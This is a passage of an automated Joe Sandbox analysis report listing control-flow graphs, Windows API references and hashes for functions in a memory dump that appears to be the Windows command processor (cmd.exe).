                                                      • Instruction Fuzzy Hash: 69919161B0968285EF25EB10D8523B9E7A5FF44B44FC48536C90E87695DFBCE504C3A2

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID: CMD.EXE
                                                      • API String ID: 1606018815-3025314500
                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction ID: 305bc909e2150de27535e9c9249add56f83aa816bc878c3d18c7c9d81822ff7b
                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction Fuzzy Hash: F141F035E09A029BE708EB15E846378BB60FB89752FC4D176C51E83364DFBCA514C662

                                                      Control-flow Graph

                                                      control_flow_graph 992 7ff7e1dbc620-7ff7e1dbc66f GetConsoleTitleW 993 7ff7e1dbc675-7ff7e1dbc687 call 7ff7e1dbaf14 992->993 994 7ff7e1dcc5f2 992->994 998 7ff7e1dbc689 993->998 999 7ff7e1dbc68e-7ff7e1dbc69d call 7ff7e1dbca40 993->999 997 7ff7e1dcc5fc-7ff7e1dcc60c GetLastError 994->997 1000 7ff7e1dcc5e3 call 7ff7e1db3278 997->1000 998->999 1004 7ff7e1dcc5e8-7ff7e1dcc5ed call 7ff7e1dc855c 999->1004 1005 7ff7e1dbc6a3-7ff7e1dbc6ac 999->1005 1000->1004 1004->994 1007 7ff7e1dbc6b2-7ff7e1dbc6c5 call 7ff7e1dbb9c0 1005->1007 1008 7ff7e1dbc954-7ff7e1dbc95e call 7ff7e1dc291c 1005->1008 1015 7ff7e1dbc9b5-7ff7e1dbc9b8 call 7ff7e1dc5c6c 1007->1015 1016 7ff7e1dbc6cb-7ff7e1dbc6ce 1007->1016 1013 7ff7e1dbc964-7ff7e1dbc96b call 7ff7e1db89c0 1008->1013 1014 7ff7e1dcc5de-7ff7e1dcc5e0 1008->1014 1021 7ff7e1dbc970-7ff7e1dbc972 1013->1021 1014->1000 1020 7ff7e1dbc9bd-7ff7e1dbc9c9 call 7ff7e1dc855c 1015->1020 1016->1004 1019 7ff7e1dbc6d4-7ff7e1dbc6e9 1016->1019 1022 7ff7e1dcc616-7ff7e1dcc620 call 7ff7e1dc855c 1019->1022 1023 7ff7e1dbc6ef-7ff7e1dbc6fa 1019->1023 1038 7ff7e1dbc9d0-7ff7e1dbc9d7 1020->1038 1021->997 1026 7ff7e1dbc978-7ff7e1dbc99a towupper 1021->1026 1028 7ff7e1dcc627 1022->1028 1027 7ff7e1dbc700-7ff7e1dbc713 1023->1027 1023->1028 1033 7ff7e1dbc9a0-7ff7e1dbc9a9 1026->1033 1029 7ff7e1dcc631 1027->1029 1030 7ff7e1dbc719-7ff7e1dbc72c 1027->1030 1028->1029 1035 7ff7e1dcc63b 1029->1035 1034 7ff7e1dbc732-7ff7e1dbc747 call 7ff7e1dbd3f0 1030->1034 1030->1035 1033->1033 1036 7ff7e1dbc9ab-7ff7e1dbc9af 1033->1036 1045 7ff7e1dbc74d-7ff7e1dbc750 1034->1045 1046 7ff7e1dbc8ac-7ff7e1dbc8af 1034->1046 1043 7ff7e1dcc645 1035->1043 1036->1015 1039 7ff7e1dcc60e-7ff7e1dcc611 call 7ff7e1ddec14 1036->1039 1041 7ff7e1dbc872-7ff7e1dbc8aa call 7ff7e1dc855c call 7ff7e1dc8f80 1038->1041 1042 7ff7e1dbc9dd-7ff7e1dcc6da SetConsoleTitleW 1038->1042 1039->1022 1042->1041 1053 7ff7e1dcc64e-7ff7e1dcc651 1043->1053 1049 7ff7e1dbc752-7ff7e1dbc764 call 7ff7e1dbbd38 1045->1049 1050 7ff7e1dbc76a-7ff7e1dbc76d 1045->1050 1046->1045 1052 7ff7e1dbc8b5-7ff7e1dbc8d3 wcsncmp 1046->1052 1049->1004 1049->1050 1056 7ff7e1dbc840-7ff7e1dbc84b call 7ff7e1dbcb40 1050->1056 1057 7ff7e1dbc773-7ff7e1dbc77a 1050->1057 1052->1050 1058 7ff7e1dbc8d9 1052->1058 1059 7ff7e1dcc657-7ff7e1dcc65b 1053->1059 1060 7ff7e1dbc80d-7ff7e1dbc811 1053->1060 1078 7ff7e1dbc856-7ff7e1dbc86c 1056->1078 1079 7ff7e1dbc84d-7ff7e1dbc855 call 7ff7e1dbcad4 1056->1079 1065 7ff7e1dbc780-7ff7e1dbc784 1057->1065 1058->1045 1059->1060 1061 7ff7e1dbc9e2-7ff7e1dbc9e7 1060->1061 1062 7ff7e1dbc817-7ff7e1dbc81b 1060->1062 1061->1062 1069 7ff7e1dbc9ed-7ff7e1dbc9f7 call 7ff7e1dc291c 1061->1069 1067 7ff7e1dbc821 1062->1067 1068 7ff7e1dbca1b-7ff7e1dbca1f 1062->1068 1070 7ff7e1dbc78a-7ff7e1dbc7a4 wcschr 1065->1070 1071 7ff7e1dbc83d 1065->1071 1074 7ff7e1dbc824-7ff7e1dbc82d 1067->1074 1068->1067 1073 7ff7e1dbca25-7ff7e1dcc6b3 call 7ff7e1db3278 1068->1073 1089 7ff7e1dcc684-7ff7e1dcc698 call 7ff7e1db3278 1069->1089 1090 7ff7e1dbc9fd-7ff7e1dbca00 1069->1090 1076 7ff7e1dbc7aa-7ff7e1dbc7ad 1070->1076 1077 7ff7e1dbc8de-7ff7e1dbc8f7 1070->1077 1071->1056 1073->1004 1074->1074 1081 7ff7e1dbc82f-7ff7e1dbc837 1074->1081 1083 7ff7e1dbc7b0-7ff7e1dbc7b8 1076->1083 1084 7ff7e1dbc900-7ff7e1dbc908 1077->1084 1078->1038 1078->1041 1079->1078 1081->1065 1081->1071 1083->1083 1091 7ff7e1dbc7ba-7ff7e1dbc7c7 1083->1091 1084->1084 1092 7ff7e1dbc90a-7ff7e1dbc915 1084->1092 1089->1004 1090->1062 1095 7ff7e1dbca06-7ff7e1dbca10 call 7ff7e1db89c0 1090->1095 1091->1053 1096 7ff7e1dbc7cd-7ff7e1dbc7db 1091->1096 1097 7ff7e1dbc93a-7ff7e1dbc944 1092->1097 1098 7ff7e1dbc917 1092->1098 1095->1062 1114 7ff7e1dbca16-7ff7e1dcc67f GetLastError call 7ff7e1db3278 1095->1114 1099 7ff7e1dbc7e0-7ff7e1dbc7e7 1096->1099 1102 7ff7e1dbca2a-7ff7e1dbca2f call 7ff7e1dc9158 1097->1102 1103 7ff7e1dbc94a 1097->1103 1100 7ff7e1dbc920-7ff7e1dbc928 1098->1100 1105 7ff7e1dbc800-7ff7e1dbc803 1099->1105 1106 7ff7e1dbc7e9-7ff7e1dbc7f1 1099->1106 1107 7ff7e1dbc932-7ff7e1dbc938 1100->1107 1108 7ff7e1dbc92a-7ff7e1dbc92f 1100->1108 1102->1014 1103->1008 1105->1043 1112 7ff7e1dbc809 1105->1112 1106->1105 1111 7ff7e1dbc7f3-7ff7e1dbc7fe 1106->1111 1107->1097 1107->1100 1108->1107 1111->1099 1111->1105 1112->1060 1114->1004
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleTitlewcschr
                                                      • String ID: /$:
                                                      • API String ID: 2364928044-4222935259
                                                      • Opcode ID: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                      • Instruction ID: 5652382e6586cbacfea63a5d71d9cb95beb8bfa4e2eb34bd2aa80afd744bc34c
                                                      • Opcode Fuzzy Hash: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                      • Instruction Fuzzy Hash: 8EC1AF61E18642A1FB24FB15D416BB9A2A0FF84B90FC88537DA1F462D5DFBCE440C362

                                                      Control-flow Graph

                                                      control_flow_graph 1171 7ff7e1dc8d80-7ff7e1dc8da2 1172 7ff7e1dc8da4-7ff7e1dc8daf 1171->1172 1173 7ff7e1dc8db1-7ff7e1dc8db4 1172->1173 1174 7ff7e1dc8dcc 1172->1174 1175 7ff7e1dc8db6-7ff7e1dc8dbd 1173->1175 1176 7ff7e1dc8dbf-7ff7e1dc8dca Sleep 1173->1176 1177 7ff7e1dc8dd1-7ff7e1dc8dd9 1174->1177 1175->1177 1176->1172 1178 7ff7e1dc8ddb-7ff7e1dc8de5 _amsg_exit 1177->1178 1179 7ff7e1dc8de7-7ff7e1dc8def 1177->1179 1180 7ff7e1dc8e4c-7ff7e1dc8e54 1178->1180 1181 7ff7e1dc8e46 1179->1181 1182 7ff7e1dc8df1-7ff7e1dc8e0a 1179->1182 1184 7ff7e1dc8e73-7ff7e1dc8e75 1180->1184 1185 7ff7e1dc8e56-7ff7e1dc8e69 _initterm 1180->1185 1181->1180 1183 7ff7e1dc8e0e-7ff7e1dc8e11 1182->1183 1186 7ff7e1dc8e13-7ff7e1dc8e15 1183->1186 1187 7ff7e1dc8e38-7ff7e1dc8e3a 1183->1187 1188 7ff7e1dc8e80-7ff7e1dc8e88 1184->1188 1189 7ff7e1dc8e77-7ff7e1dc8e79 1184->1189 1185->1184 1192 7ff7e1dc8e3c-7ff7e1dc8e41 1186->1192 1193 7ff7e1dc8e17-7ff7e1dc8e1b 1186->1193 1187->1180 1187->1192 1190 7ff7e1dc8eb4-7ff7e1dc8ec8 call 7ff7e1dc37d8 1188->1190 1191 7ff7e1dc8e8a-7ff7e1dc8e98 call 7ff7e1dc94f0 1188->1191 1189->1188 1200 7ff7e1dc8ecd-7ff7e1dc8eda 1190->1200 1191->1190 1201 7ff7e1dc8e9a-7ff7e1dc8eaa 1191->1201 1198 7ff7e1dc8f28-7ff7e1dc8f3d 1192->1198 1195 7ff7e1dc8e2d-7ff7e1dc8e36 1193->1195 1196 7ff7e1dc8e1d-7ff7e1dc8e29 1193->1196 1195->1183 1196->1195 1203 7ff7e1dc8ee4-7ff7e1dc8eeb 1200->1203 1204 7ff7e1dc8edc-7ff7e1dc8ede exit 1200->1204 1201->1190 1205 7ff7e1dc8eed-7ff7e1dc8ef3 _cexit 1203->1205 1206 7ff7e1dc8ef9 1203->1206 1204->1203 1205->1206 1206->1198
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                      • String ID:
                                                      • API String ID: 4291973834-0
                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction ID: 670618e5eb25f9c9fc1a6c64f9bb240db8d93f711c49c73dc78f429ce4a5940a
                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction Fuzzy Hash: 6D410831E08A0386FB54FB14E882735A2A4EF44745F859937D90D876A0DFFDE890C7A2

                                                      Control-flow Graph

                                                      control_flow_graph 1207 7ff7e1db89c0-7ff7e1db8a3d memset call 7ff7e1dbca40 1210 7ff7e1db8a43-7ff7e1db8a71 GetDriveTypeW 1207->1210 1211 7ff7e1db8ace-7ff7e1db8adf 1207->1211 1212 7ff7e1dcb411-7ff7e1dcb422 1210->1212 1213 7ff7e1db8a77-7ff7e1db8a7a 1210->1213 1214 7ff7e1db8ae1-7ff7e1db8ae8 ??_V@YAXPEAX@Z 1211->1214 1215 7ff7e1db8aed 1211->1215 1217 7ff7e1dcb424-7ff7e1dcb42b ??_V@YAXPEAX@Z 1212->1217 1218 7ff7e1dcb430-7ff7e1dcb435 1212->1218 1213->1211 1219 7ff7e1db8a7c-7ff7e1db8a7f 1213->1219 1214->1215 1216 7ff7e1db8aef-7ff7e1db8b16 call 7ff7e1dc8f80 1215->1216 1217->1218 1218->1216 1219->1211 1221 7ff7e1db8a81-7ff7e1db8ac8 GetVolumeInformationW 1219->1221 1221->1211 1223 7ff7e1dcb3fc-7ff7e1dcb40b GetLastError 1221->1223 1223->1211 1223->1212
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                      • String ID:
                                                      • API String ID: 850181435-0
                                                      • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                      • Instruction ID: aed5a1d0e40115584a3ea4acc74fdf75245e7e14bf6fbf7e08957f454d84217e
                                                      • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                      • Instruction Fuzzy Hash: E641AE32A08BC1D9E720DF20D8453EAB7A0FB89B85F948436DA4E8BB48CF78D555C711

                                                      Control-flow Graph

                                                      control_flow_graph 1224 7ff7e1dc4a14-7ff7e1dc4a3e GetEnvironmentStringsW 1225 7ff7e1dc4a40-7ff7e1dc4a46 1224->1225 1226 7ff7e1dc4aae-7ff7e1dc4ac5 1224->1226 1227 7ff7e1dc4a59-7ff7e1dc4a8f GetProcessHeap HeapAlloc 1225->1227 1228 7ff7e1dc4a48-7ff7e1dc4a52 1225->1228 1230 7ff7e1dc4a91-7ff7e1dc4a9a memmove 1227->1230 1231 7ff7e1dc4a9f-7ff7e1dc4aa9 FreeEnvironmentStringsW 1227->1231 1228->1228 1229 7ff7e1dc4a54-7ff7e1dc4a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1226
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                      • memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                      • String ID:
                                                      • API String ID: 1623332820-0
                                                      • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                      • Instruction ID: e7159a356838dfa925e944921bed8ffde96f7ac5a5e3fea81a3999d98a113248
                                                      • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                      • Instruction Fuzzy Hash: E211C122A08B4282DF15EB05B005239FBA0EB8DF84B989436DE0E43740DF7CE441C760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                      • String ID:
                                                      • API String ID: 1826527819-0
                                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction ID: d4a4e73356d4e9d5c7dbfef9c40d17cc312ba0178867650c8d9b58e6aa1ba63f
                                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction Fuzzy Hash: 7B015B31D086828AE708FB14E8463B8FA60FB8A756FC4A272D54F42395CFBC9044C762
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7E1DB92AC), ref: 00007FF7E1DC30CA
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC30DD
                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC30F6
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC3106
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                      • String ID:
                                                      • API String ID: 1464828906-0
                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction ID: 76a66d34887542013583b6698710f7e4e74c860733a02fc8b4b6020e6b31f2fe
                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction Fuzzy Hash: 47312562E0861186E724EF15A00227EF660FB95B80FD48636DA4A433D0EEBDE845C752
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                      • API String ID: 2221118986-3416068913
                                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction ID: c5bbe789aa92e062867f0b19c12af857f8324bbe20e35514066c1a948cae41e0
                                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction Fuzzy Hash: C211EC21B0874281EF54EB15E1463BA9250EF44BA4FD84333DE6E477D5DE7CD0808361
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memsetwcschr
                                                      • String ID: 2$COMSPEC
                                                      • API String ID: 1764819092-1738800741
                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction ID: 551e4d2b5a574d57db68f67059a82539fb13773ec96c674970ccebef499d4380
                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction Fuzzy Hash: 17519062E0864665FB64FB25A443779A391BF44784FC84033DA4F866E5DEFCE8408763
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                      • String ID:
                                                      • API String ID: 4254246844-0
                                                      • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                      • Instruction ID: 7f0706e067ea587e5421b703a0f6d6cfad5861e52a6cf91a1bc5c54f58284b71
                                                      • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                      • Instruction Fuzzy Hash: FA41B662A0C74696EF10EF01E446379EBA0EF85B80FC54932D94D47784DEBCE441C7A2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
